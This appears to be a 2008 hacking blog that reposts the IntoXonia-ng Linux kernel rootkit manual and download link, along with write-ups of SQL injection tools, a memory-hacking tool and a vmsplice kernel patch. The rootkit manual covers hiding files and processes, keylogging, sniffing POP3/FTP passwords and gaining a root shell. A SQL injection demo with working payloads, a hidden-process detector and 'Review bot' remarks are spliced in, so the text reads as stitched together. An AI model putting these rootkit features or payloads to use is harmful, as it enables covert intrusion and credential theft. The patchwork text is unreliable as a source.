ROOTKITS

Thursday, 8 May 2008

Linux LKM 2.6.x Rootkit

Linux Lkm Rootkit for 2.6.x Kernels

IntoXonia - LKM rootkit for Linux Kernel 2.6.x
==============================================

1. History
----------

I released the first version of IntoXonia in 2005. There were different replies.
The rootkit was incompatible with the 64-bit architecture because the algorithm for searching for the system
call table address didn't work properly :( I also found a bug in getting the full path to a file.
In this version I have fixed the known bugs and added new features (see the ChangeLog). The method of
rootkit configuration has IMHO changed for the better. It is realised through a fake binary file,
but all the options are now categorised.
Today, 05/28/2006, is the release date of the IntoXonia-ng LKM rootkit.

2. Features
-----------

(*) hiding files and directories
(*) hiding processes
(*) faking file removal
(*) redirecting file opens
(*) redirecting directory changes
(*) denying file opens
(*) denying directory changes
(*) adding a fake line to a file
(*) hiding lines in a file
(*) replacing strings in a file while it is read
(*) protecting a file from removal
(*) saving a copy of a file before it is removed
(*) protecting processes
(*) making aliases for commands
(*) redirecting execution of binaries
(*) denying program execution
(*) recording pressed keys (keylogger)
(*) sniffing POP3/FTP passwords
(*) loading/saving options to a file
(*) obtaining root privileges
(*) manually changing a process's UID/GID
(*) secure file erasing
(*) configuration through a fake binary
(*) protecting the configuration with a password
(*) hiding promiscuous interface mode

3. Installation
---------------

I haven't made a configurator yet, so you have to configure the rootkit manually :) Three constants
are stored in the file option.h. The CONTROL constant contains the path to the fake binary that is needed for
configuration. The PASSWORD constant contains the authorisation password. After you have edited them, you
can compile and insert the module:

# make
# make load

4. Configuration
----------------

Now all commands are unified :) As before, configuration is done through the fake
binary, by default /control. To configure, you first have to authorise:

# /control auth

All commands have the same syntax:

# /control type <+|->command args

The first parameter is the type of option. There are 6 types of commands: fs, task, prog, log, sniff, inet.
Next comes + or -, depending on the action: adding or removing a rule. The parameter "command" names
a specific option and has its own specific arguments, args.
Example: you can add a redirect rule with the following command:

# /control fs +link /etc/passwd /etc/passwd.old

You can remove this rule by changing just one character:

# /control fs -link /etc/passwd /etc/passwd.old

Apart from the main configuration rules, a few other commands exist. They are
described later. Use "close" to end the configuration session:

# /control close

5. File access options
----------------------

All commands for file access options begin with /control fs.

Command: /control fs +hide /file
Description: Removes /file from directory listings.
Note: That ls /file still works is not a bug: if you enter the full name of the file
correctly, you already know that it is there.

Command: /control fs +remove /file
Description: Fakes the removal of /file.
Note: Use this option if you want to avoid any reference to the file.

Command: /control fs +link /file1 /file2
Description: Redirects opens of /file1 to /file2.
Note: To delete a rule you need to type all the parameters that were
typed when adding it. Example:
/control fs -link /file1 /file2

Command: /control fs +link /dir1 /dir2
Description: Redirects a change into directory /dir1 to directory /dir2.
Note: Both directories must be typed without a trailing '/'.

Command: /control fs +deny /file
Description: Denies any access to /file.

Command: /control fs +line /file text task
Description: Adds the fake text 'text' to the end of /file as seen by
the program 'task'.

Command: /control fs +hline /file text
Description: Hides all lines containing 'text' in /file.

Command: /control fs +repl /file str1 str2
Description: Replaces str1 with str2 on the fly when /file is read.

Command: /control fs +protect /file
Description: Protects /file from removal.

Command: /control fs +save /file /dir/
Description: Automatically saves /file in directory /dir/ when it is removed.
Note: You have to type '/' at the end of the directory path here :)

6. Options connected with processes
-----------------------------------

This rootkit can hide and protect processes. You can hide a process
with the following command:

# /control task +hide pid

Protecting means prohibiting the sending of signals to the process:

# /control task +protect pid
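The hiding in sections 5 and 6 works on what a directory listing returns; the note on ls /file in section 5 admits that direct access by name is untouched. A defender can use exactly that asymmetry. The script below is an added example for this page, not part of IntoXonia or its README, and it assumes that process hiding behaves like the file hiding described there: the entry vanishes from the listing of /proc while /proc/<pid> itself can still be reached by name. It enumerates /proc once through readdir and once by probing every PID directly, then reports PIDs present in the second view but missing from the first.

```python
"""Cross-view check for processes hidden from directory enumeration.

Added example for this page; it is not part of IntoXonia or its README.
Assumption: process hiding works like the file hiding the README
describes, i.e. the entry disappears from the listing of /proc while
/proc/<pid> can still be opened by name.  Comparing the two views
exposes the difference.
"""
import os
import re

_PID_NAME = re.compile(r"^[0-9]+$")


def listed_pids(proc="/proc"):
    """PIDs as the directory listing (the readdir/getdents path) reports them."""
    return {int(name) for name in os.listdir(proc) if _PID_NAME.match(name)}


def read_pid_max(proc="/proc"):
    """Upper bound for the probe; Linux exposes it in /proc/sys/kernel/pid_max."""
    with open(os.path.join(proc, "sys", "kernel", "pid_max")) as fh:
        return int(fh.read())


def probed_pids(proc="/proc", pid_max=None):
    """PIDs found by asking for /proc/<pid> directly, never via a listing.

    Probing every PID up to pid_max (often 4194304 on 64-bit systems) is a
    few million stat() calls: fine for a forensic check, not for a tight loop.
    """
    if pid_max is None:
        pid_max = read_pid_max(proc)
    found = set()
    for pid in range(1, pid_max + 1):
        try:
            os.stat(os.path.join(proc, str(pid)))
        except FileNotFoundError:
            continue
        except PermissionError:
            pass  # exists but is not readable; it still counts as present
        found.add(pid)
    return found


def hidden_pids(listed, probed):
    """PIDs reachable by name but missing from the listing."""
    return sorted(probed - listed)


def still_present(candidates, proc="/proc"):
    """Second look at the candidates.

    A process that exited between the two views also looks hidden, so only
    PIDs that are still reachable by name and still absent from a fresh
    listing are worth alerting on.
    """
    fresh_listing = listed_pids(proc)
    confirmed = []
    for pid in candidates:
        if pid in fresh_listing:
            continue
        if os.path.exists(os.path.join(proc, str(pid))):
            confirmed.append(pid)
    return confirmed


if __name__ == "__main__":
    listing = listed_pids()
    probe = probed_pids()
    suspects = still_present(hidden_pids(listing, probe))
    if suspects:
        print("present in /proc but absent from its listing:", suspects)
    else:
        print("no hidden processes detected")
```

The re-check in still_present matters in practice: short-lived processes come and go between the listing and the probe, and without it every scan would produce false positives. A rootkit that also hooks stat() on /proc/<pid> would defeat this particular check, which is why such scanners usually add further views (kill(pid, 0), /proc/<pid>/status reads, scheduler statistics) and compare all of them.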

7. Options connected with executing binaries
--------------------------------------------

All commands connected with executing binaries begin with /control prog.
You can make an alias for a binary with the following command:

# /control prog +make /fake /command

Now /fake will be interpreted the same as /command.
Aliases are meant for executing hidden or forbidden binaries.
There is also redirection for programs:

# /control prog +link /prog1 /prog2

Now program /prog2 will be executed instead of /prog1.
Prohibiting the execution of binaries is done with the 'deny' option:

# /control prog +deny /prog

This command will deny execution of /prog.

8. Keylogger configuration
--------------------------

The keylogger is configured by the following command:

# /control log + uid /file

The argument uid is the user identifier whose keyboard
input will be logged to /file.

9. Sniffer configuration
------------------------

This rootkit contains a sniffer for POP3 and FTP passwords. To view all POP3 and FTP passwords
and usernames, type the following commands:

# /control sniff +pop
# /control sniff +ftp

Filtered usernames and passwords are printed with printk(), so you can
view them with the dmesg program.

10. Network configuration
-------------------------

# /control inet +promisc

Hides the PROMISC interface mode. Use it to hide an external sniffer
program that is running.

11. Saving and loading options
------------------------------

All rules for files, processes, binaries, the keylogger and the sniffer may be saved to a file
and loaded the next time you start the rootkit. There are two commands for it:

# /control save /file
# /control load /file

11. Functions of immediate execution
------------------------------------

There are several commands in this category: obtaining root privileges, manually
changing the UID/GID of a process, and secure file erasing. To get root privileges, type:

# /control rootme

The result is the execution of /bin/sh with root privileges.
To change the UID/GID of the process with identifier pid manually, type the following commands:

# /control setuid pid uid
# /control setgid pid uid

Secure file erasure can be done with the following command:

# /control erase /file

None of these functions work without authorisation :)

12. Disadvantages
-----------------

IMHO, haquer has noticed that the rootkit doesn't contain the traditional possibility of hiding
netstat contents. It is realised by hiding certain lines in /proc/net/tcp and /proc/net/udp,
so IMHO it is not a disadvantage ;) But unfortunately there are some others. Firstly, the
rootkit is not compatible with the 64-bit architecture. Secondly, all options are stored
in kernel space, where memory is not swapped. Although the rootkit works fine on most 2.6
kernels, the system call table cannot be found on newer ones. Some kernels Oops after
module unloading. It is not critical; it happens because of the read() system call
interception. Also, I don't know whether the rootkit is compatible with X.

13. Disclaimer
--------------

This module is designed to show the possibilities of intercepting system calls in Linux.
I don't guarantee that it will work without bugs. The author takes no responsibility for the use of
this program in improper ways.

14. Greetingz
-------------

WildCat - translation
EH0T, Vishnyaaa - translation
Roneon - moral support, ideas
Elena Arishina - moral support
DarkEagle - introducing me to scene :)
Dpoke Wizard - first user :)
Victor Makarov - hacking, testing
ShadOS - hacking, testing
Kolya aka prox - testing
Oberon - testing
DJ KolbasoID - cool trance
DJ Tiesto - cool trance also :)
THC - information
OpenNet.ru - information
Linux.Org.Ru - information (+ help on forum)
SecurityLab.ru - information (+ thanx for prize on competition :))
Vitaly Zaicev - hosting

And great thanx to my beloved girl Lika for the fact that she exists :)
And thanx to you, c001_H4ck3r, for having read this trash up to the end :)

You can communicate with me using e-mail: xdiman [at] mail [dot] ru

Project home site: http://satanic.easycoding.org

28-05-2006 5:28
_4epen aka Self Assured Addict %)

+++++++++++++++++++++++++++++++++++
From ShadOS

Download From Here ->> http://backdoored.net/intoxonia-ng2[1].tar.gz


Wednesday, 7 May 2008

SqlMap Sql Injection Tool

Introduction
sqlmap is an automatic SQL injection tool developed entirely in Python. It is capable of performing an extensive database management system back-end fingerprint, retrieving remote DBMS databases, usernames, tables and columns, enumerating the entire DBMS, reading system files and much more, taking advantage of web application programming security flaws that lead to SQL injection vulnerabilities.

Features
Here is a list of major features implemented in sqlmap:

- Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-ends. Besides these four DBMS, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;
- Extensive database management system back-end fingerprint based upon:
  - inband DBMS error messages
  - DBMS banner parsing
  - DBMS functions output comparison
  - DBMS-specific features such as MySQL comment injection
  - passive SQL injection fuzzing
- It fully supports two SQL injection techniques:
  - blind SQL injection, also known as inference SQL injection
  - inband SQL injection, also known as UNION query SQL injection
  and it partially supports error-based SQL injection as one of the vectors for database management system fingerprinting;
- It automatically tests all provided GET, POST, Cookie and User-Agent parameters to find dynamic ones. On these it automatically tests for and detects the ones affected by SQL injection. Moreover, each dynamic parameter is tested for numeric, single-quoted string and double-quoted string syntax, and all three of these types with one and two brackets, to find which is the valid syntax to perform further injections with;
- It is possible to provide the name of the only parameter(s) that you want to test and use for injection, whether they are GET, POST or Cookie parameters;
- SQL injection testing and detection do not depend upon the web application's database management system back-end. SQL injection exploitation and query syntax obviously do depend upon it;
- It distinguishes valid queries from false ones by comparing hashes of the HTML output page by default, but it is also possible to perform this test based upon string matching;
- HTTP requests can be performed with both the GET and POST HTTP methods (default: GET);
- It is possible to perform HTTP requests using an HTTP User-Agent header string randomly selected from a text file;
- It is possible to provide an HTTP Cookie header string, useful when the web application requires cookie-based authentication and you have such data;
- It is possible to provide an anonymous HTTP proxy address and port through which to route the HTTP requests to the target URL;
- It is possible to provide the remote DBMS back-end if you already know it, saving sqlmap the time needed to fingerprint it;
- It supports various command line options to get the database management system banner, the current DBMS user, the current DBMS database, enumerate users, user password hashes, databases, tables and columns, dump table entries, dump the entire DBMS, retrieve an arbitrary file's content (if the remote DBMS is MySQL) and provide your own SQL SELECT statement to be evaluated;
- It is possible to make sqlmap automatically detect whether the affected parameter is also affected by a UNION query SQL injection and, in that case, use it to exploit the vulnerability;
- It is possible to exclude system databases when enumerating tables, useful when dumping the entire DBMS's table entries and you want to skip the default DBMS data;
- It is possible to view the estimated time of arrival for each query's output, updated in real time while performing the SQL injection attack;
- Support for increasing the verbosity level of output messages;
- It is possible to save the queries performed and their retrieved values in real time to an output text file and later resume the injection from that file;
- PHP setting magic_quotes_gpc bypass by encoding every query string between single quotes with the CHAR (or similar) DBMS-specific function.
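Two items in the list above explain why quote-escaping was never a fix for SQL injection: dynamic parameters are tested in numeric (unquoted) form, and strings can be rebuilt with CHAR() so that no quote character ever appears in the request. The following is an added example written for this page, not sqlmap code or the blog author's, and it uses Python's bundled SQLite with a constructed users table so it runs offline. lookup_escaped() stands in for a PHP-era handler that relied on magic_quotes_gpc-style escaping; lookup_parameterized() is the corrected form.

```python
"""Escaping is not a defence: a numeric parameter and a CHAR()-built string.

Added example for this page; it is not sqlmap code or the blog's own.
The database, table and rows are constructed here so the script runs
offline against Python's bundled SQLite.
"""
import sqlite3


def make_db():
    """Constructed sample data: three users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'alice', 'user');
        INSERT INTO users VALUES (2, 'bob',   'admin');
        INSERT INTO users VALUES (3, 'carol', 'user');
        """
    )
    return conn


def magic_quotes(value):
    """What PHP's magic_quotes_gpc did to request data: backslash the quotes.
    It can only matter if the value ends up inside a quoted SQL literal."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def lookup_escaped(conn, user_id):
    """Vulnerable: id is numeric, so it is concatenated without quotes and the
    escaping above has nothing to act on.  This is the shape of the dynamic
    numeric parameters the feature list says sqlmap tests first."""
    sql = "SELECT name FROM users WHERE id = " + magic_quotes(user_id) + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_id):
    """Hardened: validate the type, then let the driver bind the value.  The
    input never becomes part of the SQL text, so neither an OR clause nor a
    CHAR()-encoded string can change what the query does."""
    try:
        uid = int(user_id)
    except ValueError:
        raise ValueError("user id must be an integer") from None
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (uid,))
    return [row[0] for row in rows]


def rejects(conn, user_id):
    """True if the hardened lookup refuses the input outright."""
    try:
        lookup_parameterized(conn, user_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(lookup_escaped(db, "2"))                            # ['bob']
    print(lookup_escaped(db, "0 OR 1=1"))                     # every row
    # No quote anywhere in this input, so magic_quotes leaves it untouched;
    # CHAR(98,111,98) evaluates to 'bob', the encoding the feature list mentions.
    print(lookup_escaped(db, "0 OR name = CHAR(98,111,98)"))  # ['bob']
    print(lookup_parameterized(db, "2"))                      # ['bob']
    print(rejects(db, "0 OR 1=1"))                            # True
```

The point of the pair is where the boundary sits: the escaping function operates on characters, while the fix operates on structure, by keeping data out of the statement text entirely. That holds for every DBMS in the list; only the placeholder syntax changes between drivers.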

You can download it from here: http://sqlmap.sourceforge.net/#download


Saturday, 29 Mar 2008

Memory Hacking Software MHS



MHS is a utility for searching, viewing, and modifying the RAM of other processes, and for disassembling and debugging other processes.

MHS sports the fastest and most efficient searches available, an advanced, colorful, and easy-to-use real-time Hex Editor, a Debugger with unique features, a Disassembler, and an extensive scripting language (L. Spiro Script) yielding unlimited potential.

The array of tools offered in MHS can make hacking any game easy.

Here is a compact list of tools and features:

Searching
Data-Type Searches
Fastest searches available.
Search for types char, byte, short, unsigned short, int, long, unsigned long, 64-bit integer, float, and double.
Search for exact values, values not equal to, ranges, greater than, less than, and unknown.
Group Searches
Find unordered sets of data.
Find relative lists of data.
String Searches
Find hex strings, ASCII strings, Unicode strings, Wildcard strings, and Regular-Expression strings.
Boyer Moore Algorithm for fast searching.
Pointer Searches
Fastest search possible.
Quickly find both static and dynamic pointers.
Script Searches
The most powerful searches possible.
You have full control over what values are found during a search.
Able to replicate all search types available in all software, now and forever.
All addresses shown after a search and without delay; no need to view “only the first 100” returns.
Converter
Convert from any type to any other type, both big and little endian.
RAM Watcher
View the RAM of the target process in real-time.
Multiple display types shown simultaneously.
Real-Time Expression Evaluator
Evaluates even the most complex of expressions.
Shows expression results in real-time; especially useful for following changing pointer locations or changing expressions.
Hex Editor
Edit files and RAM.
Files open instantly, regardless of size, and RAM is shown in real-time.
Multiple display types show you RAM and files in characters, bytes, shorts, ints, floats, doubles, and more.
Full undo/redo.
Many options and full customization.
Debugger
Breakpoint functionality can be assigned by the user, and breakpoints can call user-defined script functions for the ultimate do-what-you-want.
Hardware breakpoints.
Read/write software breakpoints (watchpoints).
The Debugger issues debugging events that can be handled by scripts, allowing the user to perform any and all operations he or she desires at key times during debugging.
Disassembler
Shows names of known functions.
Logging (to be finished).
Addresses of all imported/exported functions shown.
Auto-Hack shows you every read, write, or access to an address, and extremely advanced features will be coming soon (automatic back-tracking down to the root pointer).
Explanations of ASM instructions are provided in real-time, explaining what each instruction is going to do and offering previews of the results.
Process threads are updated in real-time and useful information about them is displayed.
Injection Manager
Complete and feature-rich injection suite.
Code caves can be found automatically, defined by the user, or created.
Code preview shows you the code before injecting.
Automatically adds the JMP back to the original code and adds the overwritten code to the code cave.
Injections are automatically saved, and options allow to inject automatically when the process is reloaded later.
Automatic injections are always safe; injections are verified before being automatically injected.
Script Editor
Syntax coloring.
Code folding.
Functions listed and easily navigated.
Hotkeys
Many assignable keys and functions.
Two hotkey implementations in case the game blocks one or the other.
Stability
MHS is extremely stable. Currently there are no known issues.
But the biggest feature in MHS is that it is constantly updated.
http://backdoored.net/MHS4.016_NoAAC.rar



Friday, 21 Mar 2008

squeeza: making your injections count



Can I get an introduction?

Sure. squeeza was released as part of SensePost's BlackHat USA 2007 talk on timing and related attacks.
What Does squeeza Do?

squeeza is a tool that helps exploit SQL injection vulnerabilities in broken web applications. Its functionality is split into creating data on the database (by executing commands, copying in files, issuing new SQL queries) and extracting that data through various channels (DNS, timing, HTTP error messages).

Currently, it supports the following databases:

- Microsoft SQL Server

squeeza is *not* a tool for *finding* injection points. That recipe generally starts with 1 x analyst.

License
squeeza is distributed under the GNU General Public License.

Download Link : http://backdoored.net/squeeza-0.21.tar.gz



Sunday, 10 Feb 2008

vmsplice patch for linux kernel !!!


— a/fs/splice.c
+++ b/fs/splice.c
@@ -1179,6 +1179,9 @@ static int copy_from_user_mmap_sem(void *dst, const void __user *src, size_t n)
{
int partial;

+ if (!access_ok(VERIFY_READ, src, n))
+ return -EFAULT;
+
pagefault_disable();
partial = __copy_from_user_inatomic(dst, src, n);
pagefault_enable();
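Review bot: the new access_ok(VERIFY_READ, src, n) at the top of copy_from_user_mmap_sem() is the missing check: __copy_from_user_inatomic() is the variant that performs no user-range validation itself, so before this hunk a caller could hand this helper a src outside user space and have it copied inside the pagefault_disable()/pagefault_enable() region. Suggest a one-line comment above the check noting that the __ variant is used here because the copy runs with page faults disabled and relies on its caller for the range check, so that a later reader does not remove the check as redundant.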
@@ -1387,6 +1390,11 @@ static long vmsplice_to_user(struct file *file, const struct iovec __user *iov,
break;
}

+ if (unlikely(!access_ok(VERIFY_WRITE, base, len))) {
+ error = -EFAULT;
+ break;
+ }
+
sd.len = 0;
sd.total_len = len;
sd.flags = flags;
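Review bot: the access_ok(VERIFY_WRITE, base, len) check is placed before sd.len, sd.total_len and sd.flags are filled from the user's iovec, which is the right spot since base and len are the values the rest of the loop body consumes, and the error = -EFAULT; break; form matches the existing early break visible just above it. Two things to confirm outside the hunk: that error is what vmsplice_to_user() returns after the loop with nothing below overwriting it, and that this per-iovec check together with the first hunk's read-side check covers both copy directions of vmsplice, since the two paths are fixed separately.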
